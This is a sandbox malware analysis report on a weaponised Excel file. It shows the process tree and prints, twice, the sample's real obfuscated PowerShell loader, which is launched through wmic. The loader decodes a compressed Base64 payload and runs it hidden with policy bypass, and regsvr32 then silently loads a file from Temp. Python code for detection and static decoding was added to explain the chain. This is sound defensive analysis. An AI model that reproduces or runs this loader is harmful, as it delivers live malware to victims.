Analysis

  • max time kernel
    135s
  • max time network
    126s
  • platform
    windows10_x64
  • resource
    win10
  • submitted
    13-07-2020 23:03

General

  • Target

    Office365_155649.xls

  • Size

    65KB

  • MD5

    ad99acf449d38ae16688948601ac1c48

  • SHA1

    aca7300bbd57be32427a1b69ab7ab9792d4d7efe

  • SHA256

    478b989b58015300f188b4d6459d08d61edef08730fdc2256601cddd7b98ebb3

  • SHA512

    9893e23ce9856eb086992d3ccbce7a673b0cbab171eeac991034eb5ac3f5d6f735e1f49a767e05dc77c1b09a3a66f161add8d2921895bf783e5b64e18057a635

Score
10/10

Malware Config

Signatures

  • Suspicious use of WriteProcessMemory 4 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Blacklisted process makes network request 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious use of SetWindowsHookEx 10 IoCs
  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Suspicious use of AdjustPrivilegeToken 43 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
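The "Process spawned unexpected child process" signature fires twice in this report: EXCEL.EXE (PID 2728) starts wmic.exe (PID 728), and a PowerShell instance (PID 2220) then appears at the top level of the tree rather than under wmic.exe. That shape is characteristic of `wmic process call create`: Win32_Process.Create launches the child from the WMI provider host (WmiPrvSE.exe), so the Office-to-PowerShell parent link is broken for any rule that only looks at direct parent/child pairs. The following detection logic is an added example written for this page, not part of the sandbox's own signatures; it runs over constructed Sysmon-style process-creation events that mirror the tree below (the WmiPrvSE.exe parent of PID 2220 is an assumption, since the report does not show it) and also handles the prefix-abbreviated PowerShell switches the sample uses (`-ExeCUTIoNpOL`, `-NOniNTER`, `-Win 01`, where WindowStyle 1 is Hidden).

```python
import re

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
LOLBINS = {"wmic.exe", "powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "cscript.exe",
           "wscript.exe", "regsvr32.exe", "rundll32.exe", "certutil.exe", "msiexec.exe"}

EXCEL = r"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"
WMIC = r"C:\Windows\System32\Wbem\wmic.exe"
WMIPRVSE = r"C:\Windows\System32\wbem\WmiPrvSE.exe"   # assumed parent of PID 2220 (not in the report)
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\pOwershElL.exe"
PS_CMD = "pOwershElL -noproF -NOniNTER -Win 01 -ExeCUTIoNpOL byPasS iex(...)"  # body elided

# Constructed Sysmon-style process-creation events mirroring the process tree in this report.
EVENTS = [
    {"pid": 2728, "image": EXCEL, "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r'"%s" "C:\Users\Admin\AppData\Local\Temp\Office365_155649.xls"' % EXCEL},
    {"pid": 728, "image": WMIC, "parent_image": EXCEL,
     "cmdline": 'wmic pROcesS call CREATE "%s"' % PS_CMD},
    {"pid": 2220, "image": PS, "parent_image": WMIPRVSE, "cmdline": PS_CMD},
    {"pid": 1508, "image": r"C:\Windows\system32\regsvr32.exe", "parent_image": PS,
     "cmdline": r'"C:\Windows\system32\regsvr32.exe" -s C:\Users\Admin\AppData\Local\Temp\JavaDeployReg.'},
]


def image_name(path):
    return path.rsplit("\\", 1)[-1].lower()


def ps_param(cmdline, name):
    """Value following a powershell.exe parameter. powershell.exe accepts any unambiguous
    prefix of a parameter name, so -ExeCUTIoNpOL, -NOniNTER and -Win all resolve.
    Returns None if the parameter is absent and "" for a bare switch."""
    toks = cmdline.split()
    for i, tok in enumerate(toks):
        if tok.startswith("-") and len(tok) > 2 and name.startswith(tok[1:].lower()):
            return toks[i + 1] if i + 1 < len(toks) else ""
    return None


def window_hidden(value):
    # -WindowStyle takes the enum name or its integer value; Hidden == 1, so "-Win 01" hides the window.
    if value is None:
        return False
    v = value.lower()
    return v.startswith("h") or (v.isdigit() and int(v) == 1)


def detect(events):
    """Return (pid, rule) pairs for the behaviours seen in this report."""
    findings = []
    for ev in events:
        img, parent, cmd = image_name(ev["image"]), image_name(ev["parent_image"]), ev["cmdline"]
        low = cmd.lower()
        if parent in OFFICE_APPS and img in LOLBINS:
            findings.append((ev["pid"], "office_app_spawns_lolbin"))
        if img == "wmic.exe" and re.search(r"process\s+call\s+create", low):
            findings.append((ev["pid"], "wmic_process_call_create"))
        # Catches the broken parent chain: the real launcher is Excel, the recorded parent is WmiPrvSE.
        if parent == "wmiprvse.exe" and img in LOLBINS:
            findings.append((ev["pid"], "wmi_provider_host_spawns_lolbin"))
        if img in ("powershell.exe", "pwsh.exe"):
            ep = ps_param(cmd, "executionpolicy")
            hidden = window_hidden(ps_param(cmd, "windowstyle"))
            if ep is not None and ep.lower().startswith("by") and \
                    (hidden or ps_param(cmd, "noninteractive") is not None):
                findings.append((ev["pid"], "powershell_bypass_hidden"))
        if img == "regsvr32.exe" and any(t in ("-s", "/s") for t in low.split()) \
                and "\\appdata\\local\\temp\\" in low:
            findings.append((ev["pid"], "regsvr32_silent_load_from_temp"))
    return findings


if __name__ == "__main__":
    for pid, rule in detect(EVENTS):
        print(pid, rule)
```

The `wmi_provider_host_spawns_lolbin` rule is the one that matters for this sample: a rule keyed only on "Office application spawns PowerShell" would see the wmic.exe launch but never the PowerShell process itself.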

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Office365_155649.xls"
    1⤵
    • Suspicious use of WriteProcessMemory
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious use of SetWindowsHookEx
    • Suspicious behavior: AddClipboardFormatListener
    PID:2728
    • C:\Windows\System32\Wbem\wmic.exe
      wmic pROcesS call CREATE "pOwershElL -noproF -NOniNTER -Win 01 -ExeCUTIoNpOL byPasS iex("\"&('s'+'al') ('utf-'+'8') ('New'+'-Obje'+'ct');& ( `${S`H`elLid}[1]+`${shEL`l`ID}[13]+'X')(.('utf'+'-8') ('i'+'o'+'.STrEa'+'MreA'+'deR')(( &('u'+'tf-8') ('IO.'+'co'+'M'+'PREsS'+'Ion'+'.DE'+'fLAtEST'+'rEam')( [sYsTem.IO.MemorYSTReAm][sYStEM.CONVeRT]::fRomBASE64StRinG( ('bVVrc9o'+'4FP0rDuOt5AJOoE03'+'CcPsEvIoKcmmhYXtUqZ2jCBq/CC2TEJd/fc9VyYkmdkPIKH7'+'Ojr36GIXay/UbcZadpHp9h6WhW43sFxdYd1726Cj2Puh25zlrMpufOZUOZulEj/yiDmteR4HSiaxddnkdtH7qJ3CLjdult9kKpXxglNax6qnYhn6geCszmp2se5r5+Xh4OmwlQqVp7FlF9+1flHgE/KMkV/O+Q5/w9lQZKoOHN0EX3EsyI12DFm7FD4GhmU'+'oFWe7zJk0p+4wldFpPOPMIp/jfD4X'+'6UD+FFbjA0KSPFZWw'+'6oLH7EDbdXvcymU4xQbPPtAYxeX3icw5hNlay/CNqZ'+'tx+sQRzEBUDIDMXYReF06SyKcWfjsLkWagD9DtzFiCbYYLRM0QB9wt6jJHM5dzhYIfIgk8HI2lvG75veAakRLaoASa'+'bbGJqOqguos02'+'RGlkAxx3HzXM4oqQDM'+'W0VODN1bZkeEBkhKGBO7ONf'+'TanmJKnMDOG0tma4'+'Z87ZRFuPfTop97bCaycH+YAgdDHQLfSHkd0BOJcGwuLf2oYdCeDO67OlLTezVDjbQYJjpKun'+'sgspTOrFlxUXnDADdAhuDko'+'gR8Pv4pNK/CbGKo905DKbCVk8W6ekr9E1lPnrHVGgdaSLBpFohomFVroRyx+KmG0p'+'h'+'395UWrjCo'+'FdW8ZGfRB8KIqzbpFOYczUn2R3QTyQ6LxPVR77jmOiRiQ7wXTlJHuIw8Wcnvr'+'KjuwqAJF7nBKrgk'+'+6tn06mU0o4enUXE22KIWWYi79ix+Wl2wYPPqHYFiEv9LoXr5I7UToSPSZf6TUnLZhcjlO/SGT8zMvQOzsnYsTVyDvyhqeXS9J4JAH'+'RLgB0o8BAGnqN96835ZkgPdVTP54ZQVKN2I/Es1AqbvF'+'e23TpMZUwwVX2jfqLAtRpmFaXZDOsvBoYRncL'+'g3Gp2xMZqymcI/0WsykmjH3vc0db29hURMlKvA687lNuOPp4zEZPbMf0nt6LHxpusswsqVhkK+rCu6Z5hj88qjoUj8o9jYNkBlDTo6O/h2cHzwNp5HVQ76'+'f3D828YkA'+'TYNJN4pVIF'+'XzP0iQ69jPx4f3g6U7/eo8vp9vAp/GWpMIPbmGVSluSzgF7QgNoSmnRnT+5uYx3PaTrrDB03GFC8umkqb82'+'xp4yU2Plm7fX84aog8zYX4QUhNdp0aX6ICJU2Eq4uAFNPDLAqVqlagttVdvWJEDyKZ8cr5UA670h4blAMKbAzWOSPhmuvaUypr7+'+'DW0igGXOqWNG5cobUfHQu+9o98vmXXK'+'KC8vRMq1WdipOraTbPRdqS9U5/hta'+'E5m4cxkKsDlOpRKdMKTKGewPusafL7xa6Veya+7tQXgOUmAm'+'kd8CM42VGn7QjtsX8ULdbqhYon3iEezT483MExRLuDabRiqkj3pmAksHQcI3Dof/h7Av4yeEE6hKPML2NJPMeK9xzr5+/n1GeUFK3+8Ki4PyzpfpwWF1s2lsNvv7Tq3cHTaJqOgOxPwH'))"\"+ ([ChAR]44).ToStrinG() 
+"\"[Io.ComprEssion.ComPreSSIoNmODE]::DecOMpREsS))"\"+ ([ChAR]44).ToStrinG() +"\" [SYsteM.tExT.EncODiNg]::AsCII)).REaDtOEnD( )"\")"
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of AdjustPrivilegeToken
      PID:728
  • C:\Windows\System32\WindowsPowerShell\v1.0\pOwershElL.exe
    pOwershElL -noproF -NOniNTER -Win 01 -ExeCUTIoNpOL byPasS iex("\"&('s'+'al') ('utf-'+'8') ('New'+'-Obje'+'ct');& ( `${S`H`elLid}[1]+`${shEL`l`ID}[13]+'X')(.('utf'+'-8') ('i'+'o'+'.STrEa'+'MreA'+'deR')(( &('u'+'tf-8') ('IO.'+'co'+'M'+'PREsS'+'Ion'+'.DE'+'fLAtEST'+'rEam')( [sYsTem.IO.MemorYSTReAm][sYStEM.CONVeRT]::fRomBASE64StRinG( ('bVVrc9o'+'4FP0rDuOt5AJOoE03'+'CcPsEvIoKcmmhYXtUqZ2jCBq/CC2TEJd/fc9VyYkmdkPIKH7'+'Ojr36GIXay/UbcZadpHp9h6WhW43sFxdYd1726Cj2Puh25zlrMpufOZUOZulEj/yiDmteR4HSiaxddnkdtH7qJ3CLjdult9kKpXxglNax6qnYhn6geCszmp2se5r5+Xh4OmwlQqVp7FlF9+1flHgE/KMkV/O+Q5/w9lQZKoOHN0EX3EsyI12DFm7FD4GhmU'+'oFWe7zJk0p+4wldFpPOPMIp/jfD4X'+'6UD+FFbjA0KSPFZWw'+'6oLH7EDbdXvcymU4xQbPPtAYxeX3icw5hNlay/CNqZ'+'tx+sQRzEBUDIDMXYReF06SyKcWfjsLkWagD9DtzFiCbYYLRM0QB9wt6jJHM5dzhYIfIgk8HI2lvG75veAakRLaoASa'+'bbGJqOqguos02'+'RGlkAxx3HzXM4oqQDM'+'W0VODN1bZkeEBkhKGBO7ONf'+'TanmJKnMDOG0tma4'+'Z87ZRFuPfTop97bCaycH+YAgdDHQLfSHkd0BOJcGwuLf2oYdCeDO67OlLTezVDjbQYJjpKun'+'sgspTOrFlxUXnDADdAhuDko'+'gR8Pv4pNK/CbGKo905DKbCVk8W6ekr9E1lPnrHVGgdaSLBpFohomFVroRyx+KmG0p'+'h'+'395UWrjCo'+'FdW8ZGfRB8KIqzbpFOYczUn2R3QTyQ6LxPVR77jmOiRiQ7wXTlJHuIw8Wcnvr'+'KjuwqAJF7nBKrgk'+'+6tn06mU0o4enUXE22KIWWYi79ix+Wl2wYPPqHYFiEv9LoXr5I7UToSPSZf6TUnLZhcjlO/SGT8zMvQOzsnYsTVyDvyhqeXS9J4JAH'+'RLgB0o8BAGnqN96835ZkgPdVTP54ZQVKN2I/Es1AqbvF'+'e23TpMZUwwVX2jfqLAtRpmFaXZDOsvBoYRncL'+'g3Gp2xMZqymcI/0WsykmjH3vc0db29hURMlKvA687lNuOPp4zEZPbMf0nt6LHxpusswsqVhkK+rCu6Z5hj88qjoUj8o9jYNkBlDTo6O/h2cHzwNp5HVQ76'+'f3D828YkA'+'TYNJN4pVIF'+'XzP0iQ69jPx4f3g6U7/eo8vp9vAp/GWpMIPbmGVSluSzgF7QgNoSmnRnT+5uYx3PaTrrDB03GFC8umkqb82'+'xp4yU2Plm7fX84aog8zYX4QUhNdp0aX6ICJU2Eq4uAFNPDLAqVqlagttVdvWJEDyKZ8cr5UA670h4blAMKbAzWOSPhmuvaUypr7+'+'DW0igGXOqWNG5cobUfHQu+9o98vmXXK'+'KC8vRMq1WdipOraTbPRdqS9U5/hta'+'E5m4cxkKsDlOpRKdMKTKGewPusafL7xa6Veya+7tQXgOUmAm'+'kd8CM42VGn7QjtsX8ULdbqhYon3iEezT483MExRLuDabRiqkj3pmAksHQcI3Dof/h7Av4yeEE6hKPML2NJPMeK9xzr5+/n1GeUFK3+8Ki4PyzpfpwWF1s2lsNvv7Tq3cHTaJqOgOxPwH'))"\"+ ([ChAR]44).ToStrinG() 
+"\"[Io.ComprEssion.ComPreSSIoNmODE]::DecOMpREsS))"\"+ ([ChAR]44).ToStrinG() +"\" [SYsteM.tExT.EncODiNg]::AsCII)).REaDtOEnD( )"\")
    1⤵
    • Suspicious use of WriteProcessMemory
    • Suspicious behavior: EnumeratesProcesses
    • Blacklisted process makes network request
    • Process spawned unexpected child process
    • Suspicious use of AdjustPrivilegeToken
    PID:2220
    • C:\Windows\system32\regsvr32.exe
      "C:\Windows\system32\regsvr32.exe" -s C:\Users\Admin\AppData\Local\Temp\JavaDeployReg.
      2⤵
        PID:1508
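The PowerShell command line above is a small loader, not the payload: `sal utf-8 New-Object` aliases New-Object as "utf-8"; `${ShellId}[1]+${ShellId}[13]+'X'` spells "ieX" because `$ShellId` is "Microsoft.PowerShell"; the `('..'+'..')` fragments rebuild a Base64 string that is fed through MemoryStream, DeflateStream(Decompress) and StreamReader.ReadToEnd before being passed to iex; and the `([ChAR]44)` pieces reinsert commas so the string survives wmic's quoting. Decoding it statically means joining the fragments, Base64-decoding and raw-inflating. The decoder below is an added example, not tooling from the sandbox; it is exercised on a constructed stage-2 string wrapped the same way, so the stage-2 content here is not the sample's real payload. The same `extract_stage2` function applies to the command line in the tree above.

```python
import base64
import re
import zlib

# $ShellId in Windows PowerShell; characters [1] and [13] are 'i' and 'e'.
SHELL_ID = "Microsoft.PowerShell"

# Constructed stage-2 script (not the sample's real payload), wrapped below the way the
# loader expects: raw DEFLATE, then Base64, then split into '+'-joined fragments.
STAGE2_SCRIPT = "Write-Host 'constructed stage two'; regsvr32.exe -s $env:TEMP\\JavaDeployReg"


def deflate_b64(text):
    """Inverse of the loader: raw DEFLATE (wbits=-15, no zlib header) then Base64."""
    comp = zlib.compressobj(level=9, wbits=-15)
    return base64.b64encode(comp.compress(text.encode("ascii")) + comp.flush()).decode("ascii")


def fragment(s, size=12):
    """Emulate the ('abc'+'def'+...) string-concatenation obfuscation."""
    return "(" + "+".join("'%s'" % s[i:i + size] for i in range(0, len(s), size)) + ")"


SAMPLE_CMDLINE = (
    "pOwershElL -noproF -NOniNTER -Win 01 -ExeCUTIoNpOL byPasS "
    "&('s'+'al') ('utf-'+'8') ('New'+'-Obje'+'ct');"
    "& ( `${S`H`elLid}[1]+`${shEL`l`ID}[13]+'X')(.('utf'+'-8') ('i'+'o'+'.STrEa'+'MreA'+'deR')"
    "(( &('u'+'tf-8') ('IO.'+'co'+'M'+'PREsS'+'Ion'+'.DE'+'fLAtEST'+'rEam')"
    "( [sYsTem.IO.MemorYSTReAm][sYStEM.CONVeRT]::fRomBASE64StRinG( "
    + fragment(deflate_b64(STAGE2_SCRIPT)) +
    "), [Io.ComprEssion.ComPreSSIoNmODE]::DecOMpREsS)), [SYsteM.tExT.EncODiNg]::AsCII)).REaDtOEnD( )"
)

# The fragment list that is the argument of FromBase64String( (...) ).
B64_ARG = re.compile(r"fRomBASE64StRinG\s*\(\s*\(((?:'[^']*'\s*\+\s*)*'[^']*')\s*\)", re.I)


def resolve_iex(cmdline):
    """Rebuild the cmdlet name hidden behind ${ShellId}[i] indexing plus a literal tail."""
    idx = [int(i) for i in re.findall(r"\$\{[^}]*\}\[(\d+)\]", cmdline)]
    tail = re.search(r"\]\s*\+\s*'([A-Za-z]+)'\s*\)", cmdline)
    return "".join(SHELL_ID[i] for i in idx) + (tail.group(1) if tail else "")


def extract_stage2(cmdline):
    """Join the quoted fragments, Base64-decode, raw-inflate: what the loader does in memory."""
    m = B64_ARG.search(cmdline)
    if not m:
        raise ValueError("no fragmented Base64 argument found")
    b64 = "".join(re.findall(r"'([^']*)'", m.group(1)))
    return zlib.decompress(base64.b64decode(b64), -15).decode("ascii")


if __name__ == "__main__":
    print(resolve_iex(SAMPLE_CMDLINE), "->", extract_stage2(SAMPLE_CMDLINE))
```

`zlib.decompress(..., -15)` is the important detail: .NET's DeflateStream writes raw DEFLATE with no zlib or gzip header, so the default `zlib.decompress` (which expects a zlib header) fails on it.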

Network

MITRE ATT&CK Enterprise v6

Downloads

  • memory/728-4-0x0000000000000000-mapping.dmp

  • memory/1508-5-0x0000000000000000-mapping.dmp

  • memory/2728-3-0x00000145AA600000-0x00000145AA605000-memory.dmp

    Filesize

    20KB